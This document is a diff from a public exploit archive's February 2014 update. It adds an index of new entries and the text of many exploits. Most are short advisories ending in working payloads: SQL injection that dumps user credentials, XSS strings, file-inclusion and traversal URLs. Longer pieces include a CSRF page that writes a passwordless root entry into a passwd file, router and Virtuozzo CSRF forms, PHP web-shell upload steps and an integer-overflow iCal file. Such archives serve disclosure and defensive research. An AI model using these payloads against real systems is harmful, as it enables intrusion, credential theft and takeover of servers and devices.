Updated 02_13_2014

files.csv

@@ -28360,3 +28360,42 @@ id,file,description,date,author,platform,type,port
 31566,platforms/php/webapps/31566.txt,"@lex Guestbook <= 4.0.5 index.php test Parameter XSS",2008-03-31,ZoRLu,php,webapps,0
 31567,platforms/php/webapps/31567.txt,"@lex Poll 1.2 'setup.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0
 31568,platforms/php/webapps/31568.txt,"PHP Classifieds 6.20 Multiple Cross Site Scripting and Authentication Bypass Vulnerabilities",2008-03-31,ZoRLu,php,webapps,0
+31569,platforms/hardware/webapps/31569.txt,"D-Link DSL-2750B ADSL Router - CSRF Vulnerability",2014-02-11,killall-9,hardware,webapps,80
+31570,platforms/php/webapps/31570.txt,"Wordpress Frontend Upload Plugin - Arbitrary File Upload",2014-02-11,"Daniel Godoy",php,webapps,80
+31573,platforms/hardware/webapps/31573.txt,"WiFi Camera Roll 1.2 iOS - Multiple Vulnerabilities",2014-02-11,Vulnerability-Lab,hardware,webapps,8880
+31575,platforms/windows/remote/31575.rb,"KingScada kxClientDownload.ocx ActiveX Remote Code Execution",2014-02-11,metasploit,windows,remote,0
+31576,platforms/windows/local/31576.rb,"Windows TrackPopupMenuEx Win32k NULL Page",2014-02-11,metasploit,windows,local,0
+31577,platforms/unix/remote/31577.rb,"Kloxo SQL Injection and Remote Code Execution",2014-02-11,metasploit,unix,remote,7778
+31578,platforms/windows/webapps/31578.txt,"Tableau Server - Blind SQL Injection Vulnerability",2014-02-11,"Trustwave's SpiderLabs",windows,webapps,80
+31579,platforms/windows/webapps/31579.txt,"Titan FTP Server 10.32 Build 1816 - Directory Traversal Vulnerability",2014-02-11,"Fara Rustein",windows,webapps,0
+31580,platforms/php/webapps/31580.txt,"Jax Guestbook 3.31/3.50 'jax_guestbook.php' Cross-Site Scripting Vulnerability",2008-03-31,ZoRLu,php,webapps,0
+31581,platforms/php/webapps/31581.txt,"PhpGKit 0.9 'connexion.php' Remote File Include Vulnerability",2008-03-31,ZoRLu,php,webapps,0
+31582,platforms/asp/webapps/31582.txt,"EfesTECH Video 5.0 'catID' Parameter SQL Injection Vulnerability",2008-03-31,RMx,asp,webapps,0
+31584,platforms/php/webapps/31584.txt,"Terracotta 'index.php' Local File Include Vulnerability",2008-04-01,"Joseph Giron",php,webapps,0
+31585,platforms/windows/dos/31585.c,"Microsoft Windows XP/VISTA/2000/2003/2008 Kernel Usermode Callback Local Privilege Escalation Vulnerability (1)",2008-04-08,Whitecell,windows,dos,0
+31587,platforms/php/webapps/31587.txt,"EasySite 2.0 browser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
+31588,platforms/php/webapps/31588.txt,"EasySite 2.0 image_editor.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
+31589,platforms/php/webapps/31589.txt,"EasySite 2.0 skin_chooser.php EASYSITE_BASE Parameter Remote File Inclusion",2008-04-02,ZoRLu,php,webapps,0
+31590,platforms/php/webapps/31590.txt,"DivXDB 2002 0.94b Multiple Cross-Site Scripting Vulnerabilities",2008-04-02,ZoRLu,php,webapps,0
+31592,platforms/windows/dos/31592.txt,"Microsoft Internet Explorer 8 Beta 1 XDR Prototype Hijacking Denial of Service Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0
+31593,platforms/windows/dos/31593.txt,"Microsoft Internet Explorer  8 Beta 1 'ieframe.dll' Script Injection Vulnerability",2008-04-02,"The Hacker Webzine",windows,dos,0
+31594,platforms/linux/dos/31594.html,"Opera Web Browser 9.26 Multiple Security Vulnerabilities",2008-04-03,"Michal Zalewski",linux,dos,0
+31595,platforms/php/webapps/31595.txt,"Joomla! and Mambo Joomlearn LMS Component 'cat' Parameter SQL Injection Vulnerability",2008-04-03,The-0utl4w,php,webapps,0
+31596,platforms/php/webapps/31596.txt,"mcGallery 1.1 admin.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31597,platforms/php/webapps/31597.txt,"mcGallery 1.1 index.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31598,platforms/php/webapps/31598.txt,"mcGallery 1.1 sess.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31599,platforms/php/webapps/31599.txt,"mcGallery 1.1 stats.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31600,platforms/php/webapps/31600.txt,"mcGallery 1.1 detail.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31601,platforms/php/webapps/31601.txt,"mcGallery 1.1 resize.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31602,platforms/php/webapps/31602.txt,"mcGallery 1.1 show.php lang Parameter XSS",2008-04-03,K-9999,php,webapps,0
+31603,platforms/php/webapps/31603.html,"Parallels Virtuozzo Containers 3.0.0-25.4/4.0.0-365.6 VZPP Interface File Manger Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0
+31604,platforms/php/webapps/31604.html,"Parallels Virtuozzo Containers 3.0.0-25.4.swsoft VZPP Interface Change Pass Cross-Site Request Forgery Vulnerability",2008-04-03,poplix,php,webapps,0
+31605,platforms/php/webapps/31605.txt,"Poplar Gedcom Viewer 2.0 Search Page Multiple Cross-Site Scripting Vulnerabilities",2008-04-04,ZoRLu,php,webapps,0
+31606,platforms/php/webapps/31606.txt,"Glossaire 2.0 'glossaire.php' Cross-Site Scripting Vulnerability",2008-04-04,ZoRLu,php,webapps,0
+31607,platforms/windows/dos/31607.py,"SmarterTools SmarterMail 5.0 HTTP Request Handling Denial Of Service Vulnerability",2008-04-04,ryujin,windows,dos,0
+31608,platforms/php/webapps/31608.txt,"KwsPHP 1.0 ConcoursPhoto Module 'VIEW' Parameter Cross-Site Scripting Vulnerability",2008-04-04,"H-T Team",php,webapps,0
+31609,platforms/php/webapps/31609.txt,"Nuke ET 3.4 'mensaje' Parameter HTML Injection Vulnerability",2008-04-04,"Jose Luis Zayas",php,webapps,0
+31610,platforms/php/webapps/31610.txt,"RobotStats 0.1 graph.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0
+31611,platforms/php/webapps/31611.txt,"RobotStats 0.1 robotstats.inc.php DOCUMENT_ROOT Parameter Remote File Inclusion",2008-04-04,ZoRLu,php,webapps,0
+31613,platforms/osx/remote/31613.ics,"Apple iCal 3.0.1 'COUNT' Parameter Integer Overflow Vulnerability",2008-04-21,"Core Security Technologies",osx,remote,0
+31614,platforms/php/webapps/31614.txt,"Tiny Portal 1.0 'shouts' Cross-Site Scripting Vulnerability",2008-04-04,Y433r,php,webapps,0

platforms/asp/webapps/31582.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/28532/info
+
+EfesTECH Video is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+EfesTECH Video 5.0 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/default.asp?catID=-1%20union%20select%200,kullanici,eposta,3,4,5,sifre,7,8,9,10,11,12,13%20from%20uyeler
+

platforms/hardware/webapps/31569.txt

@@ -0,0 +1,21 @@
+# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
+# Date : 10-02-2014
+# Author : killall-9@mail.com
+# Vendor site : http://www.d-link.com
+# Version : DSL-2750B 
+# Tested on : Firmware Version: EU_2.02; Hardware Version: B1
+
+The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.
+
+POC=>
+
+<html lang="en">
+<head>
+<title>Pinata-CSRF-poc for D-Link</title>
+</head>
+<body>
+<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
+</body>
+</html>
+
+cincin°°°

platforms/hardware/webapps/31573.txt

@@ -0,0 +1,249 @@
+Document Title:
+===============
+WiFi Camera Roll v1.2 iOS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+http://www.vulnerability-lab.com/get_content.php?id=1192
+
+
+Release Date:
+=============
+2014-02-08
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1192
+
+
+Common Vulnerability Scoring System:
+====================================
+7.9
+
+
+Product & Service Introduction:
+===============================
+Download or upload photos/videos via WiFi! It is a easy way to wirelessly access your photos/videos in camera roll on devices. 
+It only needs a web browser and not depends on any other transfer utilities. Just start the app and input the address into the 
+address bar of your browser, you can browser the photos/videos in camera roll on your device. What`s more, you can upload 
+photos/videos and it will help you save them into camera roll automatically.
+
+- You can browser the photos in camera roll on device
+- Download photos in full-size with EXIF metadata
+- Upload the specified format images into camera roll
+- Optional password protection for the web interface
+- One app compatible for both iPhone and iPad
+- Support major browsers e.g. Safari, Chrome, IE, etc.
+- A web browser is enough and not depends on flash, java, etc.
+- [NEW] Download unmodified HD quality video
+- [NEW] Upload specified format videos directly into your camera roll
+- [NEW] View photo gallery in web browser
+
+I`m always keeping this app concise and easy to use. It is just a bridge to connect your iPhone/iPad and computer. All photos and 
+videos are saved in your system album and your computer. So it is safe and won`t lost even if you accidentally delete this app.
+
+(Copy of the Homepage: https://itunes.apple.com/ch/app/wifi-camera-roll/id576954110 )
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official WiFi Camera Roll v1.2 iOS mobile web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2014-02-08:    Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Apple AppStore
+Product: WiFi Camera Roll (iOS) - Application 1.2
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+1.1
+A local file/path include web vulnerability has been discovered in the official WiFi Camera Roll v1.2 iOS mobile web-application.
+The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system 
+specific path commands to compromise the web-application or mobile device.
+
+The local file include web vulnerability is located in the vulnerable `qqfile` name value of the `upload files` module (web-interface).
+Remote attackers are able to inject own files with malicious filename to compromise the mobile application. The attack vector is 
+persistent and the request method is POST. The local file/path include execute occcurs in the main file index section after the refresh 
+of the file upload. The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability 
+scoring system) count of 7.8(+)|(-)7.9.
+
+Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. 
+Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized 
+local file include web attacks.
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Input(s):
+				[+] Upload Files
+
+Vulnerable Parameter(s):
+				[+] filename > qqfile
+
+Affected Module(s):
+				[+] Access from Computer (File Dir Index List - Folder/Category to  path=/)
+
+
+1.2
+An arbitrary file upload web vulnerability has been discovered in the official WiFi Camera Roll v1.2 iOS mobile web-application.
+The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
+
+The vulnerability is located in the `upload file` (video and images) module. Remote attackers are able to upload a php or js web-shells by renaming 
+the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name 
+and extension `image.gif.jpg.html.js.aspx.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & 
+.gif file extension and can access the application with elevated access rights. The security risk of the arbitrary file upload web vulnerability is 
+estimated as high with a cvss (common vulnerability scoring system) count of 6.4(+)|(-)6.5.
+
+Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
+Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
+
+
+Request Method(s):
+				[+] [POST]
+
+Vulnerable Module(s):
+				[+] Upload (GUI)
+
+Vulnerable Parameter(s):
+				[+] filename > qqfile (multiple extensions)
+
+Affected Module(s):
+				[+] File Dir Upload Ajax (http://localhost:8880/upload.ajax?qqfile=)
+
+
+Proof of Concept (PoC):
+=======================
+The arbitrary file upload and local file include web vulnerability can be exploited by remote attackers without user interaction or privileged web user account.
+For security demonstration or to reproduce the remote vulnerabilities follow the provided information and steps below.
+
+1.1
+PoC: File Include Vulnerability
+http://localhost:8880/upload.ajax?qqfile=%20../\../\[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg
+
+1.2
+PoC: Arbitrary File Upload
+http://localhost:8880/upload.ajax?qqfile=5d476cebd60705.gif.jpg.html.js.aspx.jpg
+
+
+--- PoC 1.1 Session Logs [POST] ---
+Status: pending[]
+POST http://localhost:8880/upload.ajax?qqfile=[LOCAL FILE/PATH INCLUDE VULNERABILITY!].jpg Load Flags[LOAD_BYPASS_CACHE  ] Gr??e des Inhalts[unknown] Mime Type[unknown]
+   Request Header:
+      Host[localhost:8880]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      X-File-Name[8f11a581d505d476cebd607056e4c167621c2e61.jpg]
+      Cache-Control[no-cache]
+      Content-Type[application/octet-stream]
+      X-Mime-Type[image/jpeg]
+      Referer[http://localhost:8880/upload.html]
+      Content-Length[24386]
+   POST-Daten:
+      POST_DATA[????
+
+
+--- PoC 1.2 Session Logs [POST] ---
+Status: pending[]
+POST http://localhost:8880/upload.ajax?qqfile=5d476cebd60705.gif.jpg.html.js.aspx.jpg Load Flags[LOAD_BYPASS_CACHE  ] Gr??e des Inhalts[unknown] Mime Type[unknown]
+   Request Header:
+      Host[localhost:8880]
+      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
+      Accept-Encoding[gzip, deflate]
+      X-Requested-With[XMLHttpRequest]
+      X-File-Name[8f11a581d505d476cebd607056e4c167621c2e61.jpg]
+      Cache-Control[no-cache]
+      Content-Type[application/octet-stream]
+      X-Mime-Type[image/jpeg]
+      Referer[http://localhost:8880/upload.html]
+      Content-Length[24386]
+   POST-Daten:
+      POST_DATA[????
+
+Reference(s):
+http://localhost:8880/
+http://localhost:8880/upload.html
+http://localhost:8880/upload.ajax?qqfile=
+
+
+Solution - Fix & Patch:
+=======================
+1.1
+The local file include vulnerability can be patched by a secure parse and encode of the vulnerable filename and qqfile values in the affected upload POST method request.
+
+1.2
+The arbitrary file upload vulnerability can be parsed by restriction and secure filter validation mechanism to prevent uploads of data with multiple file extensions.  
+
+
+Security Risk:
+==============
+1.1
+The security risk fo the local file include web vulnerability in the qqfile and filename values are estimated as high.
+
+1.2
+The security risk of the arbitrary file upload web vulnerability is estimated as high.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
+either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
+Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business 
+profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some 
+states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation 
+may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases 
+or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       - www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       - admin@evolution-sec.com
+Section:    www.vulnerability-lab.com/dev 	- forum.vulnerability-db.com 		       - magazine.vulnerability-db.com
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       - youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
+media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and 
+other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), 
+modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
+
+-- 
+VULNERABILITY LABORATORY RESEARCH TEAM
+DOMAIN: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+
+

platforms/osx/remote/31613.ics

@@ -0,0 +1,45 @@
+source: http://www.securityfocus.com/bid/28629/info
+
+Apple iCal is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
+
+This issue affects iCal 3.0.1 running on Mac OS X 10.5.1; previous versions may also be affected. 
+
+BEGIN:VCALENDAR
+X-WR-TIMEZONE:America/Buenos_Aires
+PRODID:-//Apple Inc.//iCal 3.0//EN
+CALSCALE:GREGORIAN
+X-WR-CALNAME: Vulnerable
+VERSION:2.0
+X-WR-RELCALID:10DE4203-4FA5-4E23-AE4D-9DAE3157C9E5
+METHOD:PUBLISH
+BEGIN:VTIMEZONE
+TZID:America/Buenos_Aires
+BEGIN:DAYLIGHT
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:19991003T000000
+RDATE:19991003T000000
+TZNAME:ARST
+END:DAYLIGHT
+BEGIN:STANDARD
+TZOFFSETFROM:-0300
+TZOFFSETTO:-0300
+DTSTART:20000303T000000
+RDATE:20000303T000000
+RDATE:20001231T210000
+TZNAME:ART
+END:STANDARD
+END:VTIMEZONE
+BEGIN:VEVENT
+SEQUENCE:4
+DTSTART;TZID=America/Buenos_Aires:20071225T110000
+DURATION:PT1H
+UID:48878014-5F03-43E5-8639-61E708714F9A
+DTSTAMP:20071213T130632Z
+SUMMARY:Vuln
+CREATED:20071213T130611Z
+RRULE:FREQ=DAILY;INTERVAL=1;COUNT=2147483646
+END:VEVENT
+END:VCALENDAR

platforms/php/webapps/31570.txt

@@ -0,0 +1,18 @@
+# Exploit Title: Frontend Upload Wordpress Plugin - File Arbitrary Upload
+# Date: 10/02/2014
+# Author: Daniel Godoy
+# Author Mail: DanielGodoy[at]GobiernoFederal[dot]com
+# Author Web: www.delincuentedigital.com.ar
+# Software: Frontend Upload
+# http://codecanyon.net/item/frontend-upload/6076410?WT.ac=solid_search_item&WT.seg_1=solid_search_item&WT.z_author=gtPlugins
+# Tested on: Linux
+[Comment]Greetz: Ariel Orellana, TrustedBSD, Sunplace www.remoteexecution.net www.remoteexcution.com.ar
+
+[PoC]
+
+you can upload files with php extension. Example: c99.php, shell.gif.php, etc...
+
+http://localhost/wp-content/uploads/feuGT_uploads/feuGT_1790_43000000_948109840.php
+
+-------------------------
+Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

platforms/php/webapps/31580.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28523/info
+
+Jax Guestbook is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/scripting/php/guestbook/guestbook/jax_guestbook.php?language="><script>alert()</script> 

platforms/php/webapps/31581.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28526/info
+
+PhpGKit is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.
+
+PhpGKit 0.9 is vulnerable; other versions may also be affected.
+
+http://www.example.com/phpg_kit_path/connexion.php?DOCUMENT_ROOT=ZoRLu.txt? 

platforms/php/webapps/31584.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28550/info
+
+Terracotta is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.
+
+http://www.example.com/index.php?CurrentDirectory=FOLDER_420c142a1bebd1.90885049/../../../../../../../../../etc/&StartAt=12 

platforms/php/webapps/31587.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28563/info
+
+EasySite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+
+EasySite 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=ZoRLu.txt?

platforms/php/webapps/31588.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28563/info
+ 
+EasySite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+ 
+EasySite 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Easysite-2.0_path/configuration/image_editor.php?EASYSITE_BASE=ZoRLu.txt?

platforms/php/webapps/31589.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28563/info
+  
+EasySite is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
+  
+EasySite 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/Easysite-2.0_path/configuration/skin_chooser.php?EASYSITE_BASE=ZoRLu.txt? 

platforms/php/webapps/31590.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28566/info
+
+DivXDB 2002 is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+DivXDB 2002 0.94b is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?choice="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?choice=14&_page_="><script>alert("CANAKKALE-GECiLMEZ")</script>&year_inf=1998&year_sup=2008 http://www.example.com/index.php?_page_="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&zone_admin="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search=1&object="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&general_search="><script>alert("CANAKKALE-GECiLMEZ")</script>&object= http://www.example.com/index.php?_page_=main.html&import="><script>alert("CANAKKALE-GECiLMEZ")</script> http://www.example.com/index.php?_page_=main.html&choice="><script>alert("CANAKKALE-GECiLMEZ")</script> 

platforms/php/webapps/31595.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/28586/info
+
+The Joomlearn LMS component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_lms&task=showTests&cat=-1 union select 1,concat(username,char(32),password),3,4,5,6,7 from jos_users/* 

platforms/php/webapps/31596.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/admin.php?lang=<script>alert(document.c-o-o-k-i-e)</script>

platforms/php/webapps/31597.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+ 
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/index.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31598.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+  
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/sess.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31599.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+   
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/stats.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31600.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+    
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/detail.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31601.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+     
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/resize.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31602.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28587/info
+      
+mcGallery is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+      
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+      
+mcGallery 1.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/[path]/show.php?lang=<script>alert(document.c-o-o-k-i-e)</script

platforms/php/webapps/31603.html

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28589/info
+
+Parallels Virtuozzo Containers is prone to a cross-site request-forgery vulnerability.
+
+Exploiting the issue will allow a remote attacker to use a victim's currently active session to perform certain file-management actions with the privileges of the user running the application. Successful exploits will compromise affected computers.
+
+Virtuozzo Containers 3.0.0-25.4.swsoft and 4.0.0-365.6.swsoft are vulnerable; other versions are also affected.
+
+<!-- poplix papuasia.org -- http://px.dynalias.org -- 04-02-2008 this file exploits a vulnerable installation of virtuozzo web panel by overwriting /etc/passwd.demo tested against Version 365.6.swsoft (build: 4.0.0-365.6.swsoft). It doesn't work with older version due to paths changes. perform the following steps to test it: 1. create a blank /etc/passwd.demo on target machine 2. in this file replace 127.0.0.1 with target vps address 3. open a web browser and log into virtuozzo web interface 4. open this file in a new browser window and click the "lets rock" button when the page is fully loaded 5. check /etc/passwd.demo in the target vps filesystemm --> <script language="JavaScript"> var ok=false; function letsgo(){ ok=true; document.getElementById('form0').submit(); } </script> <!-- this sets /etc as the current path--> <iframe style="width:1px;height:1px;visibility:hidden" name=ifr src="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/index?path=L2V0Yw==" ></iframe> <iframe id=ifr1 style="width:1px;height:1px;visibility:hidden" name=ifr1 onload="if(ok)document.getElementById('form1').submit();" ></iframe> <iframe id=ifr2 style="width:1px;height:1px;visibility:hidden" name=ifr2 > </iframe> <!-- delete /etc/passwd.demo --> <form id=form0 target=ifr1 method=post action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/list-control" > <input type=hidden name="file-name" value="passwd.demo"> <input type=hidden name=delete value=1> </form> <!-- create /etc/passwd.demo --> <form id=form1 target=ifr2 enctype="multipart/form-data" name="defaultForm" method="POST" action="https://127.0.0.1:4643/vz/cp/vzdir/infrman/envs/files/create-file"> <input xmlns:http="http://www.swsoft.com/xsl/cp/http" type="hidden" name="step" value="gen"> <input type=hidden name="file_name" value="passwd.demo"> <input type=hidden name="file_body" value="root::0:0::/root:/bin/bash"> <input type=hidden name="next" value="Create"> </form> <input type=button value="lets rock" onclick="letsgo()"> 

platforms/php/webapps/31604.html

@@ -0,0 +1,9 @@
